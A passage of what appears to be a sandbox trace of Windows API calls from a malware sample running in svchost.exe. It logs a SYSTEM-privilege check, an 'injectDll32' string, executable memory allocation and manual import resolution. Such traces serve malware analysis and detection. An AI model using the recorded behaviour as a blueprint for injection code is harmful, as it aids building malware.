6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xda\xfe\xa5\x41\xbc\xfa\x1d", lpUsedDefaultChar=0x0) returned 256
	[0188.307] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x27ba60
	[0188.307] RtlInitializeSListHead (in: ListHead=0x1008ef08 | out: ListHead=0x1008ef08) 
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x27d2f8
	[0188.308] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0188.308] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1008efe8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x27bae8
	[0188.308] GetEnvironmentStringsW () returned 0x27db00*
	[0188.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1097, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1097
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x449) returned 0x27e3a0
	[0188.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1097, lpMultiByteStr=0x27e3a0, cbMultiByte=1097, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1097
	[0188.308] FreeEnvironmentStringsW (penv=0x27db00) returned 1
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x78) returned 0x271630
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x27d088
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x2776c0
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x27e7f8
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x27e838
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x279870
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x27e858
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x44) returned 0x277710
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x27e878
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x27a620
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x8d) returned 0x27e898
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x274330
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x27d0b0
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x44) returned 0x277760
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x27e930
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x27e950
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x27d0d8
	[0188.308] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27d100
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x2777b0
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x27e970
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x27a638
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x27e990
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x27e9b0
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x27e9d0
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x27e9f0
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x13) returned 0x27ea10
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x35) returned 0x27ea30
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x27ea70
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x27db18
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x277800
	[0188.309] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e3a0 | out: hHeap=0x260000) returned 1
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x2798a0
	[0188.309] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274378
	[0188.309] ResetEvent (hEvent=0x8) returned 1
	[0188.309] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0188.312] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.312] GetLastError () returned 0x57
	[0188.312] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1df900 | out: lpSystemTimeAsFileTime=0x1df900*(dwLowDateTime=0x5a04f880, dwHighDateTime=0x1d50a6a)) 
	[0188.313] GetLastError () returned 0x7e
	[0188.313] SetLastError (dwErrCode=0x7e) 
	[0188.313] GetCurrentProcess () returned 0xffffffff
	[0188.313] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1df928 | out: TokenHandle=0x1df928*=0x78) returned 1
	[0188.313] GetTokenInformation (in: TokenHandle=0x78, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1df92c | out: TokenInformation=0x0, ReturnLength=0x1df92c) returned 0
	[0188.313] GetLastError () returned 0x7a
	[0188.313] GetTokenInformation (in: TokenHandle=0x78, TokenInformationClass=0x1, TokenInformation=0x27db38, TokenInformationLength=0x14, ReturnLength=0x1df92c | out: TokenInformation=0x27db38, ReturnLength=0x1df92c) returned 1
	[0188.313] ConvertSidToStringSidW () returned 0x1
	[0188.313] _wcsicmp (_Str1="S-1-5-18", _Str2="S-1-5-18") returned 0
	[0188.313] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1df9d4 | out: lpWSAData=0x1df9d4) returned 0
	[0188.321] lstrlenA (lpString="injectDll32") returned 11
	[0188.321] GetTickCount () returned 0xa863e3
	[0188.321] GetLastError () returned 0x0
	[0188.321] SetLastError (dwErrCode=0x0) 
	[0188.321] CryptAcquireContextW (in: phProv=0x1df8e8, szContainer="㤲㌰㘵㤱", szProvider=0x0, dwProvType=0x1, dwFlags=0x28 | out: phProv=0x1df8e8*=0x27e608) returned 1
	[0188.350] VirtualAlloc (lpAddress=0x0, dwSize=0x35600, flAllocationType=0x3000, flProtect=0x4) returned 0x540000
	[0188.372] VirtualAlloc (lpAddress=0x0, dwSize=0x3b000, flAllocationType=0x3000, flProtect=0x40) returned 0x580000
	[0188.375] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x1df85c, Source="KERNEL32.dll" | out: Destination="KERNEL32.dll") returned 1
	[0188.375] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x1df884 | out: BaseAddress=0x1df884*=0x76b10000) returned 0x0
	[0188.375] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="EnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x773777a0) returned 0x0
	[0188.375] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="LeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x77377760) returned 0x0
	[0188.375] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x7738a149) returned 0x0
	[0188.375] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5ca7c) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="DeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x77389ac5) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetEvent", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bccc) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ResetEvent", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bcb4) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WaitForSingleObjectEx", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bab0) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CreateEventW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b63386) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetModuleHandleW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6374d) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b633d3) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsDebuggerPresent", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b53ea8) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6ed38) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b63d01) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetStartupInfoW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b63891) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsProcessorFeaturePresent", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b676b5) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bb9f) returned 0x0
	[0188.376] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5cac4) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bb80) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b62fde) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InitializeSListHead", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x77395eeb) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5cdcf) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b52331) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6450e) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="EncodePointer", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x7738a295) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="DecodePointer", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x7738cd10) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="MultiByteToWideChar", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6452b) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bb08) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InitializeCriticalSectionAndSpinCount", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b63939) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsAlloc", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b635a1) returned 0x0
	[0188.377] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5da70) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5da88) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsFree", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b613b8) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="LCMapStringW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b613d0) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetLocaleInfoW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b66596) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetStringTypeW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b667c8) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCPInfo", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b61e2e) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bf00) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5d9d0) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="LoadLibraryExW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b54775) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="RaiseException", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b4eb60) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InterlockedFlushSList", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x77383129) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="RtlUnwind", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b47f70) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ExitProcess", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6214f) returned 0x0
	[0188.378] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetModuleHandleExW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b53e39) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b633f6) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapAlloc", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x77382dd6) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapReAlloc", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x7739ff51) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapFree", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5bbd0) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetACP", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b639aa) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetStdHandle", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b61e46) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetFileType", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b675a5) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsValidLocale", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b53de4) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetUserDefaultLCID", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b66584) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="EnumSystemLocalesW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b9f3df) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b60e62) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FindFirstFileExA", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b9f3ef) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FindNextFileA", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5a187) returned 0x0
	[0188.379] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsValidCodePage", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6c1c0) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetOEMCP", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b53db9) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCommandLineA", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b698ff) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCommandLineW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b6679e) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b61dbc) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FreeEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b61dc3) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetProcessHeap", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b61280) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FlushFileBuffers", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b47f81) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b61400) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetConsoleCP", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b62c8a) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetConsoleMode", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b62412) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b596fb) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetFilePointerEx", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b4f5b2) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetStdHandle", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b9f589) returned 0x0
	[0188.380] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapSize", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x77389bec) returned 0x0
	[0188.381] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WriteConsoleW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b582f1) returned 0x0
	[0188.381] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ReadConsoleW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b70e73) returned 0x0
	[0188.381] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0x1df87c | out: ProcedureAddress=0x1df87c*=0x76b5cc56) returned 0x0
	[0188.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1df868 | out: lpSystemTimeAsFileTime=0x1df868*(dwLowDateTime=0x5a0e7e00, dwHighDateTime=0x1d50a6a)) 
	[0188.381] GetCurrentThreadId () returned 0x418
	[0188.381] GetCurrentProcessId () returned 0x110
	[0188.381] QueryPerformanceCounter (in: lpPerformanceCount=0x1df860 | out: lpPerformanceCount=0x1df860*=26221877920) returned 1
	[0188.381] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0188.381] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.381] GetLastError () returned 0x57
	[0188.381] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0188.381] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0188.381] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.381] GetLastError () returned 0x57
	[0188.381] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.382] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.382] GetLastError () returned 0x57
	[0188.382] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0188.382] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0188.382] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0188.382] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.382] GetLastError () returned 0x57
	[0188.382] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0188.382] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0188.382] GetProcessHeap () returned 0x260000
	[0188.382] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.382] GetLastError () returned 0x57
	[0188.383] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.383] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.383] GetLastError () returned 0x57
